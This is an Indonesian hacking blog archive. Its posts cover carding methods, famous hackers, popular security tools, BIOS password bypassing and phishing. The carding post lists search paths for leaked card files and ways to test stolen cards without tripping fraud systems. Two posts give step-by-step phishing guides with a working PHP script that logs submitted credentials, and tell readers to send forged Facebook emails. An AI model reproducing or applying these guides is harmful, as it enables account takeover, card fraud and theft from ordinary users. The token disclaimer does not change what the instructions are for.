Showing posts with label Hacking area. Show all posts
Showing posts with label Hacking area. Show all posts

Thursday, March 25, 2010

Carding

Kartu kredit menawarkan kemudahan bagi penggunanya karena dengan kartu kredit, melakukan transaksi tidak harus dengan uang cash yang lebih sulit untuk dibawa-bawa apalagi jumlahnya mencapai puluhan juta rupiah. Dengan hanya sebuah kartu, Anda bisa berbelanja sampai puluhan dan bahkan ratusan juta rupiah, sesuai dengan platform yang diberikan oleh pihak bank.

Kemudahan ini berlaku untuk semua pihak, baik pembeli, penjual dan... carder. Pencurian dan penggunaan kartu kredit secara illegal sudah dilakukan semenjak dulu dan masih bertahan sampai dengan saat ini. Kejahatan yang dikenal dengan carding ini semakin marak pada jamannya internet.

Dalam dunia transaksi elektronik, keamanan terhadap data-data user dan data-data transaksi itu sendiri sudah di terapkan bahkan di terus ditingkatkan dari waktu ke waktu. Penerapan system SSL untuk memastikan jalur yang dilalui oleh data penting ini aman dari hacker, penerapan system validitasi kartu itu sendiri dari pihak ke tiga, penerapan Address Verification Services di level payment gateway untuk membandingkan informasi yang diberikan oleh user dengan data kartu user itu sendiri, belum lagi Fraud Detection system yang begitu " cerewet " dan susah untuk diajak " kolusi ". System ini bertugas mendeteksi beberapa hal yang janggal seperti Shipping-Billing Mismatch Filter yang mengidentifikasi perbedaan alamat pengiriman dengan alamat tagihan kartu atau biling statement, Trancsaction IP Velocity Filter yang mendeteksi adanya aksi " borong " belanja dengan kartu yang berbeda tapi menggunakan Internet protokol yang sama, dll.


Pertanyanya, kenapa aksi carding terus terjadi dan makin di minati? bukankah dengan pengamanan " segede gaban " dan mesiu yang ngga main-main tersebut mustinya membuat mati kutu para carder? apa yang menyebabkan aksi carding ini terkesan " ngga ada matinye "?

Kalo begitu mari kita terjun langsung ke lapangan

Saya yakin pembaca blog ini bukan carder dan tidak tertarik untuk menjadi carder, tetapi dalam menjawab hal di atas kita harus menyelami cara carder bekerja dari mulai cara mendapatkan kartu sampai memilh sasaran penipuan.

Untuk mendapatkan data-data kartu kredit, ada banyak cara, dari mulai masuk ke forum-forum underground, masuk ke IRC chat, atau " mungutin " di cache google dengan keyword tertentu seperti, /cvv2.txt, /mysql/shopping.mdb, /database/shopping350.mdb, atau membuat toko online palsu untuk menarik calon pembeli yang tidak jeli dan mendapatkan data-data kartu kreditnya, sampai cara yang lebih " jantan " yaitu mendobrak langsung database dari situs e comerce yang mempunyai celah keamanan pada aplikasi situsnya. OK, kita pilih cara yang terakhir dan kebetulan tersedia contoh nyata khusus untuk penulisan ini.


Carder bisa masuk dan mengerxtract data kartu kredit seperti yang diperlihatkan pada gambar di atas. Database yang saya dapatkan ini berasal dari sebuah toko online yang masih aktif, artinya database berisi data kartu kredit yang masih valid dan siap " gesek ".

Sekali lagi, dalam transaksi elektronik, perlindungan kepada pemilik kartu yang sah/customer, di fokuskan hanya pada level payment gateway. Gateway ini melakukan serangkaian ujian dan pencocokan data kartu terhadap siapapun yang menggunakan jalur ini tidak peduli itu pemilik sah dari kartu atau carder.

Yang jadi masalah adalah perlindungan maksimal penggunaan kartu kredit, tidak di ikuti di level aplikasi web sehingga dengan cerdiknya, carder tinggal mencari kelemahan pada titik yang paling lemah ini. ( hacking seputar kelemahan web aplikasi bisa Anda baca di blog ini juga ).

Tidak heran, bila sebagian besar carder menargetkan sasarannya pada situs-situs penjualan online yang tidak terlalu besar karena pengamanan yang biasanya jauh lebih lemah dibandingkan dengan situs besar seperti ebay, yahoo, paypal, dan lain sebainya.

Card verification ala carder

Sebagai carder, bahaya juga selalu mengintai karena bayarannya adalah penjara. Tidak heran, para carder biasanya cukup teliti dan berhati-hati dalam membelanjakan data data curian yang didapatkan. Ada sebuah " grammer " tersendiri di sini bahwa transaksi tidak boleh menimbulkan error apapun. Error bisa disebabkan karena kartu yang digunakan sudah tidak valid, kadaluarsa, limit belanja yang habis atau bahkan kartu kredit palsu.

Agar tidak menimbulkan kecurigaan akibat banyaknya kegagalan yang terjadi, para carder seringkali melakukan verifikasi kartu kredit yang didapatkan. Carder bisa memanfaatkan yahoo wallet ( http://wallet.yahoo.com ), ebay ( www.ebay.com ), dll.

Untuk menguji kecocokan antara nomer kartu kredit dan type kartu, carder melakukannya dengan mudah dengan melihat 2 digit awal dari 16 digit nomer kartu. Sebagai contoh, : 528722xxxxxxxxxx menunjukan Mastercard, 60110xxxxxxxxxxx menunjukan Discovercard, dll. Selain secara manual, pengecekan juga bisa dilakukan secara online seperti yang ditunjukan oleh gambar dibawah.


Sebenarnya carder jaman sekarang mempunyai banyak kendala dalam membelanjakan kartu curiannya, kita bicara untuk wilayah nasional Indonesia tentunya. Indonesia sudah dikenal di manca negara sebagai salah satu negara asal carder dan ini menyedihkan.

Dampak dari ' predikat ' ini adalah shiping atau pengiriman barang ke wilayah Indonesia di tolak dan bahkan seluruh transaksi dengan alamat IP asal Indonesia akan ditolak secara otomatis dan tidak di tanggapi. Walaupun menggunakan proxy, Fraud detection system tetap melakukan pembatasan wilayah pengiriman. Ruang gerak carder menjadi sempit, kartu kredit menjadi data yang tak berguna, termasuk orang-orang jujur yang memang ingin berbelanja secara sah dan jujur.

Benarkah data kartu kredit menjadi tak berguna?

Tidak bisa dipungkiri banyak toko online yang menutup akses untuk wilayah pengiriman barang ke Indonesia, tapi itu bukan berarti tidak ada yang mau sama sekali. Beberapa situs seperti situs dari hongkong menjadi favorit carder.

Demi mendapatkan keuntungan dari data kartu yang dimilikinya, carder sangatlah kreatif. Transaksi barang boleh saja gagal, tapi " meng-uangkan " kartu kredit illegal ini tetap bisa di lakukan dengan banyak cara. Sebagai contoh, beberapa transaksi favorit yang dilakukan para carder seperti belanja domain atau hosting di luar negeri untuk dijual kembali ke dalam negeri dengan harga murah, belanja file hosting, Live adult Chat account ( chating porno ) yang per-accountnya di jual sekitar 20 ribu sampai 100 ribu rupiah tergantung life time dari account tersebut, membeli proxy berbayar untuk keperluan carding atau menjual kembali ke pengguna proxy lain yang biasannya berbentuk Egold. Penggunaan Egold sangat disukai karena masalah kemanan.

Carding terus tumbuh subur seiring kemiskinan materi maupun moral negeri ini. Dia terus melakukan penetrasi pembongkaran data-data pribadi dengan pola baru, phising, scam, dll. Anda juga bisa " belajar " dari para carder ini tentang bagaimana bernegosiasi dengan calon korban. Kalau Anda jarang mendapatkan SPAM Anda bisa membaca spambox di alamat http://oss.sgi.com/archives/mbox/lockmeter/2007-09 untuk sekedar mengetahui akal bulus penjahat kerah putih ini.



Read more...

Saturday, December 5, 2009

10 hacker ternama dunia

Keahlian seorang hacker seringkali dianggap ‘merepotkan’ sejumlah korbannya. Padahal belum tentu semua hacker bisa dicap negatif, banyak diantara mereka yang menggunakan keahliannya untuk tujuan-tujuan melihat atau memperbaiki kelemahan perangkat lunak di komputer.

Tapi akibat, ulah sejumlah hacker yang menggunakan keahliannya untuk tujuan jahat seringkali hacker mendapat pandangan negatif dari masyarakat.

Perjalanan untuk menjadi seorang hacker sendiri dilalui melalui perjalanan yang panjang. Untuk menjadi seorang hacker terkenal, tak jarang harus berhadapan dengan penjara. Tengok saja perjalanan 10 hacker ternama dunia berikut seperti dilansir Telegraph, Minggu (29/11).

1. Kevin Mitnick
Pria kelahiran 6 Agustus 1963 ini adalah salah satu hacker komputer yang paling kontroversial di akhir abad ke-20. Pengadilan Amerika Serikat bahkan menjulukinya sebagai buronan kriminal komputer yang paling dicari di Amerika. Kevin diketahui pernah membobol jaringan komputer milik perusahaan telekomunikasi besar seperti Nokia, Fujitsu and Motorola.

Kevin Mitnick ditangkap FBI pada Januari 1995 di apartemennya di kota Raleigh, North Carolina atas tuduhan penyerangan terhadap pemerintahan. Saat ini, ia berprofesi sebagai seorang konsultan keamanan sistem jaringan komputer.

2. Kevin Poulson
Jauh sebelum menjadi senior editor di Wired News, Pria bernama lengkap Kevin Lee Poulsen ini dikenal sebagai seorang hacker jempolan. Pria kelahiran Pasadena Amerika Serikat, 1965 ini pernah membobol jaringan telepon tetap milik stasiun radio Los Angeles KIIS-FM, sehingga ia seringkali memenangkan kuis-kuis radio. Bahkan lewat kuis telepon via radio ia bisa memenangkan sebuah hadiah utama, mobil Porsche.

3. Adrian Lamo
Nama Adrian Lamo sering dijuluki sebagai ‘the homeless hacker’ pasalnya ia sering melakukan aksi-aksinya di kedai-kedai kopi, perpustakaan atau intenetcafe. Aksinya yang paling mendapatkan perhatian adalah ketika ia membobol jaringan milik perusahaan Media, New York Times dan Microsoft, MCI WorldCom, Ameritech, Cingular. Tak hanya itu, ia juga berhasil menyusupi sistem milik AOL Time Warner, Bank of America, Citigroup, McDonald’s and Sun Microsystems. Kini pria tersebut berprofesi sebagai seorang jurnalis.

4. Stephen Wozniak
‘Woz’ begitu ia biasa disapa. Saat ini mungkin lebih dikenal sebagai seorang pendiri Apple. Tapi saat menjadi mahasiswa, Wozniak pernah menjadi seorang hacker yang cukup mumpuni. Pria berusia 59 tahun itu diketahui pernah membobol jaringan telepon yang memungkinkannya menelepon jarak jauh tanpa membayar sedikit pun dan tanpa batas waktu. Alat yang dibuat semasa menjadi mahasiswa itu dikenal dengan nama ‘blue boxes’

5. Loyd Blankenship
Pria berjuluk The Mentor ini pernah menjadi anggota grup hacker kenamaan tahun 1980 Legion Of Doom. Blakenship adalah penulis buku The Conscience of a Hacker (Hacker Manifesto). Buku yang ditulis setelah ia ditangkap dan diumumkan dalam ezine hacker bawah tanah Phrack.

6. Michael Calce
Sejak usia muda Calce memang dikenal sebagai seorang Hacker. Aksinya membobol situs-situs komersial dunia dilakukannya ketika ia berusia 15 tahun. Pria yang menggunakan nama MafiaBoy dalam setiap aksinya itu, ditangkap ketika membobol pada tahun 2000 mengacak-acak eBay, Amazon and Yahoo.

7. Robert Tappan Morris
Nama Morris dikenal sebagai seorang pembuat virus internet pada tahun 1988, atau dikenal sebagai ‘Morris Worm’ yang diketahui merusak sekira 6.000 komputer. Akibat ulahnya ia dikenai sanksi untuk bekerja sosial selama 4000 jam. Kini ia bekerja sebagai pendidik di Massachusetts Institute of Technology.

8. The Masters Of Deception
The Masters Of Deception (MoD) merupakan kelompok hacker yang berbasis di New York. Kelompok ini sering mengganggu jaringan telepon milik perusahaan telekomunikasi seperti AT&T. Sejumlah anggota kelompok ini ditangkap pada tahun 1992 dan dijebloskan ke penjara.

9. David L. Smith
Smith dikenal sebagai penemu Mellisa worm, yang pertama kali ditemukan pada 26 Maret 1999. Mellisa sering juga dikenal sebagai “Mailissa”, “Simpsons”, “Kwyjibo”, atau “Kwejeebo”. Virus ini didistribusikan lewat email. Smith sendiri akhirnya diseret ke penjara karena virusnya telah menyebabkan kerugian sekira USD80 juta

10. Sven Jaschan
Jaschan menorehkan namanya sebagai seorang penjahat dunia maya pada tahun 2004 saat membuat program jahat Netsky dan Sasser worm. Saat ini ia bekerja di sebuah perusahaan keamanan jaringan.


Read more...

Sunday, November 8, 2009

Software hacking populer digunakan

Setiap tentara memiliki senjata khusus untuk berperang. Begitu juga seorang hacker yang wajib memiliki beragam tools untuk membantu penyerangan. Berbagai tools/software tersebut memang didesain khusus dengan tujuan yang khusus pula. Masing-masing memiliki kelebihan dan kekuranganya.

Ada yang hanya digunakan sebagai pengintai, penganalisis, penjebak, penyerang, pengumpan atau sebagai pelindung. Dari berbagai forum saya mendapatkan 7 tools yang umumnya digunakan oleh sebagai hacker, yaitu:

1. nMap



Mungkin sebagian orang tidak aneh lagi mendengar nama besar nMap. Software ini cukup lama wara-wiri di dunia bawah tanah (red: hacking). nMap atau Nerworking Map banyak digunakan untuk untuk eksplorasi dan analisis kemananan sebuah jaringan. Tools ini didesain mengetahui port-port yang terbuka atau tidak terfilter dengan baik.
Keunggulan nMap sudah tidak diragukan lagi. Bahkan para administrator jaringan menggunakan software ini untuk mengetahui kemananan jaringannya sendiri. Sesuai namanya, nMap (networking map) akan memetakan berbagai informasi penting dalam jaringan, misalnya informasi host, service, sistem operasi, tipe paket yang dikirim, firewall, dan lain-lain.
nMap dapat dijalankan pada berbagai sistem operasi. Namun yang lebih penting software ini gratis digunakan. Silakan kunjungi situs resminya disini atau download programnya disini.

2. Nessus


Nessus adalah software terpopuler yang banyak digunakan organisasi keamanan jaringan dunia. Sekarang ini Nessus telah digunakan di lebih dari 75.000 organisasi dunia. Tools ini dimanfaatkan untuk mengetahui kelemahan/celah keamanan sebuah jaringan. Meskipun source kode nessus tidak dibagi lagi, namun program ini masih bebas digunakan secara gratis. Sifatnya yang dengan kamampuanya yang handal ini yang membuat Nessus banyak diminati. Hitung-hitung memperoleh keuntungan dengan mengurangi anggaran perusahaan membeli software analisis keamanan. Silakan kunjungi situs resminya disini dan Download programnya disini.

3. Wireshark


Wireshark adalah tools Network Protocol Analyser. Software ini digunakan untuk menganalisa paket yang melalui protokol jaringan. Wireshrark banyak digunakan sebagai sniffer yang dipakai untuk mengambil data yang keluar masuk dalam lalu-lintas jaringan. Data-data penting seperti username dan password adalah incaran target utama dari tools ini. Menarik bukan?
Wireshark dapat berjalan di sistem operasi windows maupun linux. Namun kebanyakan lebih banyak dipakai oleh linux user karena lebih mudah dikonfigurasinya. Silakan kunjungi situs resminya disini dan download softwarenya disini.

4. Cain and Abel


Siapa yang tidak kenal dengan tools yang satu ini. Kemampuanya dalam pencurian username dan password di jaringan membuat software ini menjadi barang wajib yang terinstal di komputer seorang hacker.
Berbagai kelebihan Cain and Abel antara lain: Microsoft recovery password, cracking encrypted password, recording voip communication, decoding scrambled passwords, revealing password boxes, uncovering cached passwords dan analyzing routing protocols.
Meskipun tools ini hanya berjalan di sistem operasi windows, namun dengan segala kelebihanya anda bisa mencoba tools ini. Silakan kunjingi situs resminya disini dan download softwarenya.

5. Kismet


Kismet banyak digunakan sebagai wireless detector, sniffer, data capture dan instrusion detection system. Kismet dapat bekerja pada semua jenis kartu wireless yang telah didukung oleh raw monitoring (rfmon) mode. Kismet bekerja pada semua jaringan wireless 802.11b, 802.11a, dan 802.11g. Silakan kunjungi situs resminya disini atau download programnya disini.

6. Netstumbler


Tools ini tidak didesain untuk windows, namun masih tetap bisa digunakan di sistem operasi ini, meskipun berbagai fitur dan ketangguhanya lebih optimal jika terpasang di sistem operasi linux. Sama seperti Kismet, Netstumbler banyak digunakan sebagai Wireless network detection, snifffer, capture. Dengan tampilan dan menu yang mudah dipahami, Netstumbler banyak digunakan sebagai tools untuk war driving. Silakang kunjungi situs resminya disini dan download programnya.

7. Superscan
Superscan banyak digunakan sebagai TCP Port Scanner, pinger dan resolver. Superscan adalah tools terpopuler di windows untuk masalah port scanner. Jika anda pemula dan merasa tidak nyaman menggunakan nMap dengan tampilanya yang hanya berupa text, maka Superscan adalah alternatif penggantinya dengan tampilan interface yang mudah dipahami. Silakan kunjungi situs resminya disini dan download Programnya disini.



Read more...

Hack Bios Password


Ada beberapa cara yang dapat digunakan untuk mereset Password pada Bios. Dari cara manual dengan bongkar pasang batere sampai cara unik membongkar password pada laptop. Oke langsung saja akan saya bahas satu persatu dari yang paling mudah sampai yang sedikit rumit namun sebenarnya asik untuk dicoba.


1. Clear CMOS
Cara ini kuanggap cara paling kuno sekaligus paling mudah untuk menjebol password pada BIOS. Langkahnya mudah saja, pertama buka casing penutup CPU komputer. Kemudian cari Batere bios yang bentuknya mirip-mirip dengan batere jam cuma sedikit lebih gede. Setelah ketemu perhatikan daerah di sekitar batere biasanya terdapat jumper dengan 3 pin, 2 pin terhubung dan 1 pin tidak.

Misalkan 3 pin tersebut dengan kode 1 - 2 - 3. Posisi konektor awal yang terhubung biasanya adalah 2 - 3. Untuk mereset bios caranya pindahkan posisi konektor yang menghubungkan pin 2 - 3 ke posisi 1 - 2 selama kurang lebih 5 detik. Kemudian pasang kembali ke posisi awal (2 - 3). Coba restart kembali komputer, dijamin password bios sudah lenyap.

Jika cara di atas terlihat rumit, mudahnya untuk menclear cmos adalah dengan mencopot batere BIOS kemudian memasangnya kembali. Namun dengan konsekuensi mencopot label garansi pada batere bios tersebut.

2. Reset lewat DOS
Cara kedua yang biasa digunakan adalah mereset password bios melalui command prompt DOS. Masuk terlebih dahulu ke DOS dengan mengakses Start - All program - accessoris - Command Prompt. Atau untuk lebih cepatnya masuk ke run - cmd.

Setelah jendela command prompt muncul, ketik debug kemudian enter. Lanjutkan dengan menjalankan perintah berikut ini.

o 70 10
o 71 20
quit
exit

Lihat hasilnya, bios yang terpassword telah menghilang dari pandangan.
catatan: Jika tidak bisa masuk ke windows untuk mengakses command prompt dapat dilakukan melalui safe mode with command prompt yang bisa diakses dengan menekan tombol F8 sebelum login windows.

3. BIOS_PW
Cara ketiga ini saya dapatkan dari artikel yang dibuat oleh Mas Mamas. Penggunaan software ini sangat manjur untuk jenis BIOS phoenix, misalnya BIOS yang digunakan pada laptop Acer. Untuk menggunakanya harus menggunakan komputer lain yang normal.

Download terlebih dahulu softwarenya disini. Ekstrak hasil file BIOS.rar yang telah di download kemudian pindahkan file BIOS_PW.exe ke partisi D:

Masuk ke BIOS komputer yang BIOSnya terpassword. Tekan saja tombol enter berulang ulang sampai muncul pesan "system disabled [14662]". (kode error)

Langkah selanjutnya masuk ke komputer yang telah dicopykan software BIOS_PW.exe ke direktori D: . Masuk ke command prompt kemudian ketik perintah berikut ini.
D:
BIOS_PW 14662 0
Maka akan muncul beberapa kombinasi password yang bisa digunakan untuk membuka password phoenix tersebut.
Selamat mencoba



Read more...

Hacking facebook dengan fake login


Kemaren sempat hunting ke lorong bawah tanah. Say hi!... dengan teman lama satu perjuangan. Hasilnya adalah sebuah script menarik untuk membuat fake login di facebook. Langsung saja, sebenarnya teknik penggunaan fakelogin untuk mencuri username dan password telah saya bahas di artikel sebelumnya, silakan baca disini. Jika pada sebelumnya adalah teori dasar membuat fake login, pada artikel ini akan saya berikan script sekaligus prakteknya.

Hal pertama yang harus dilakukan adalah memiliki webhosting yang support php dan tidak menampilkan iklan popup. Kamu bisa menggunakan yang free, misalnya: byethost, Ripway, Geocities, dll. Langkah selanjutnya download script fake login lengkap disini.

Setelah di ekstrak terdapat tiga file yaitu index.html, logs.php dan logs.txt. Simpan kedalam salah satu direktori dalam web hosting. Misalnya http://namawebhosting.com/facebook. Catat alamat link tersebut.

Selanjutnya adalah membuat email palsu. Patikan nama depan dan nama belakang yang anda gunakan adalah Facebook. Hal ini memastikan penerima email tidak ragu terhadap pengirim email. Misalnya email palsu anda adalah admin_facebook@yahoo.co.id . Setelah itu, download contoh isi email palsu yang berisi pemberitahuan konfirmasi pertemanan, dapat anda Download Disini.

Buka cantoh isi email palsu tersebut, kemudian ganti Nama yang warna merah dengan nama palsu anda. Dan ganti alamat email palsu yang warna merah dengan alamat email palsu anda. Copy isi email palsu tersebut ke kotak pengiriman email anda.

Selanjutnya perhatikan link yang ada dalam isi pesan, seperti ini: http://www.facebook.com/n/?reqs.php&mid=883451G4a3b0e7eG88f1e5G2. Blok alamat link tersebut dan arahkan ke alamat fake login yang telah anda buat sebelumnya.

Ini adalah contoh halaman Fake Login yang telah jadi

Selesai, kirim email palsu tersebut ke email teman yang memiliki account facebook. Biarkan mereka membukanya dan mengklik link tersebut dan dipastikan username dan password mereka akan terjaring.

Selamat Mencoba...

Catatan:
Artikel ini hanyalah sekelumit ilmu yang cukup diketahui tapi jangan dipraktekan. Apalagi untuk disalahgunakan.



Read more...

hack account dengan fake login


saya sepertinya sudah gila menerbitkan artikel-artikel yang seharusnya tidak layak dipublikasikan. Tapi tidak mengapalah, saya hanya menyalurkan ide yang tidak bisa selamanya saya simpan dalam kepala penuh dosa ini. Ha3x... Teknik pencurian password menggunakan fake login atau lebih dikenal dengan nama phising telah saya bahas sebelumnya disini. Begitu juga dengan halaman fakelogin untuk facebook juga dapat dilihat disini. Nah bagi yang mau bereksperimen sendiri dengan berbagai halaman login palsu misalnya yahoo mail, gmail, paypal, ebay, atau bahkan account sebuah Bank? silakan dicoba disini ha3x....



Langkah pertama yang dilakukan adalah masuk ke halaman login situs yang menjadi target misalnya yahoo mail. Save Page As (default untuk firefox) atau simpan seluruh halaman secara komplit pada sebuah folder terpisah (misalkan beri nama folder mail). Kamu akan mendapatkan satu buah file html dan sebuah folder yang berisi image dan file lainya. Nah selanjutnya ganti nama file HTML menjadi index.html

Masih pada folder yang sama, buat sebuah file baru dan beri nama serial.txt. Kemudian buah sebuah file php dengan code script di bawah ini. Kemudian Simpan dengan nama login.php. Pastikan kode warna merah diganti dengan nama domain tempat penyimpanan file fake login tersebut.


Header("Location: http://nama-domain.com");
$handle = fopen("serial.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


Langkah berikutnya adalah buka file index.html yang tadi menggunakan text editor. Kemudian cari code yang mengarahkan Form login biasanya diindikasikan dengan nama
Kemudian ganti action ke file login.php yang telah dibuat dan ganti method menjadi GET. Kira-kira hasilnya menjadi seperti ini:


Jika sudah, upload semua file tersebut kedalam hosting kamu sendiri dan mulailah mencari target phising sebagai korban pertama anda.. ha3x... Selamat Mencoba
Sumber:idecapung blog



Read more...

Sponsored link:

Get $$$ just clik and register hehe:

IP track:

Get Bonus:

List:

 

About This Blog

Yahoo bot last visit powered by MyPagerank.Net
Powered by  MyPagerank.Net
Counter Powered by  RedCounter

counter map
HYBRID Blog's Copyright © 2009 Blogger Template Designed by Bie Blogger Template